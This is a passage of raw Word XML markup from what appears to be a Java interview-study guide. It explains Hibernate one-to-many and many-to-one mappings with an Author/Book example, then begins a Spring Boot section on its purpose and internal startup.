          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The fetch type can be LAZY or EAGER. LAZY means books will be fetched only when needed, i.e., when we access the books field of Author.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D56DD59"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@ManyToOne</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (on the "many" side):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38767EB7" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This annotation represents the many-to-one relationship. Each book has one author.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E81529" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@JoinColumn(name = "author_id")</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This specifies the foreign key column in the Book table that refers to the Author table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4680A833" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C1925B"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When you persist an Author, Hibernate will not automatically insert the Book entities. You must manually assign Book entities to the Author entity and persist them separately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D188121"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The mappedBy attribute ensures that the Author class is aware that the relationship is maintained in the Book class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201EA130"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fetch = FetchType.LAZY ensures that the books collection in Author is not loaded from the database unless accessed explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521A6BE1" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA96E7A"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 Creating an Author</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3100330F"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Author author = new Author();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB3A023"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author.setName("J.K. Rowling");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591348D0" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53DD3531"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 Creating books</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E8CA3"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Book book1 = new Book();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28764260"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book1.setTitle("Harry Potter and the Sorcerer's Stone");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDD2BB3"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book1.setAuthor(author);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE24F2A" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B03CFA1"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Book book2 = new Book();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C41375E"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book2.setTitle("Harry Potter and the Chamber of Secrets");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF5EFDC"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book2.setAuthor(author);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FF952C" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="750AB969"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 Assigning books to author</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3777D7DF"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Set&lt;Book&gt; books = new HashSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA1610E"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books.add(book1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4914FDCC"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books.add(book2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45595F4A"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author.setBooks(books);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A96E1B" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF1BB94"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 Persisting the Author and Books</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB5F854"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session.save(author);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22048702"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session.save(book1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BC1F0F"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session.save(book2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2600594B" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766E59BA"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@OneToMany</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to define a one-to-many relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0275195A"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In this relationship, one entity (e.g., Author) is related to multiple entities (e.g., Book).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615A5102"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The mappedBy attribute on the "one" side (Author) indicates the owning side of the relationship, which is the "many" side (Book).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E2A639" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The @ManyToOne annotation on the "many" side (Book) defines the foreign key relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C17173" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0099012D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="149393E8">
          <v:rect id="_x0000_i2469" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0EE869" w14:textId="4BA34996" w:rsidR="00AF0B20" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF0B20" w:rsidP="00AF0B20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7820C4" w14:textId="7DEB35C3" w:rsidR="00071C81" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="00071C81">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="564" w:name="_Toc196308044"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Spring Boot</w:t>
      </w:r>
      <w:bookmarkEnd w:id="564"/>
    </w:p>
    <w:p w14:paraId="764721A3" w14:textId="77777777" w:rsidR="00972DE6" w:rsidRPr="00CE4B95" w:rsidRDefault="00972DE6" w:rsidP="00972DE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="274DF885" w14:textId="0DBEA9FB" w:rsidR="00972DE6" w:rsidRPr="00CE4B95" w:rsidRDefault="00594200" w:rsidP="00972DE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="565" w:name="_Toc196308045"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Spring Boot? Why is it used</w:t>
      </w:r>
      <w:r w:rsidR="00972DE6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="565"/>
    </w:p>
    <w:p w14:paraId="40400409" w14:textId="74BCDEB3" w:rsidR="001F0776" w:rsidRPr="00CE4B95" w:rsidRDefault="001F0776" w:rsidP="00D23D62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot is an open-source framework developed by Pivotal that simplifies the development of production-ready Spring applications. It is built on top of the Spring Framework and provides a set of tools and conventions to make it easier to create stand-alone, production-grade Spring-based applications with minimal configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E7A070" w14:textId="77777777" w:rsidR="001F0776" w:rsidRPr="00CE4B95" w:rsidRDefault="001F0776" w:rsidP="001F0776">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key reasons why Spring Boot is used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B02DA5B" w14:textId="77777777" w:rsidR="001F0776" w:rsidRPr="00CE4B95" w:rsidRDefault="001F0776">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Auto-Configuration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Automatically configures Spring application based on the dependencies present in the classpath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777F9DA9" w14:textId="77777777" w:rsidR="001F0776" w:rsidRPr="00CE4B95" w:rsidRDefault="001F0776">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Standalone Applications:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enables building stand-alone applications with an embedded server like Tomcat or Jetty, eliminating the need for external deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D05CF8" w14:textId="77777777" w:rsidR="001F0776" w:rsidRPr="00CE4B95" w:rsidRDefault="001F0776">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Production-Ready Features:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Includes built-in features like health checks, metrics, and monitoring via Spring Boot Actuator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558B8A9B" w14:textId="77777777" w:rsidR="001F0776" w:rsidRPr="00CE4B95" w:rsidRDefault="001F0776">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Minimal Configuration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reduces the need for boilerplate code and XML configurations by using sensible defaults.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65514787" w14:textId="77777777" w:rsidR="001F0776" w:rsidRPr="00CE4B95" w:rsidRDefault="001F0776">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Rapid Development:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Speeds up the development process with built-in tools like Spring Initializr and developer-friendly defaults.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A320378" w14:textId="77777777" w:rsidR="001F0776" w:rsidRPr="00CE4B95" w:rsidRDefault="001F0776">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Easy Integration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Seamlessly integrates with Spring Cloud, JPA, Kafka, Security, and other Spring ecosystem components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740B1139" w14:textId="707CE9DD" w:rsidR="001F0776" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001F0776">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="7B11AF3E">
          <v:rect id="_x0000_i2470" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B085A82" w14:textId="12F9B589" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00FE7F8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="566" w:name="_Toc196308046"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain internal working of Spring Boot application?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="566"/>
    </w:p>
    <w:p w14:paraId="72830C91" w14:textId="6103FD06" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E0">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internal workings of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot application</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> involve several components that are orchestrated together to provide a smooth and efficient experience for developers. Here’s an overview of the internal working of a Spring Boot application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2885F9A8" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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Application Startup and Auto-Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C779EC"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run a Spring Boot application (usually via the main method), Spring Boot follows a few steps internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9D2F0C" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E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pringBootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3222B0CF"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pringBootApplication annotation is the entry point of a Spring Boot application and combines the following annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E5B9AE" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="144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figuration: Marks the class as a source of bean definitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4311492A" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55E0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="144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ableAutoConfiguration: Enables auto-configuration of Spring Beans based on the application's classpath and other configurations.</w:t>
      </w:r>
    </w:p>
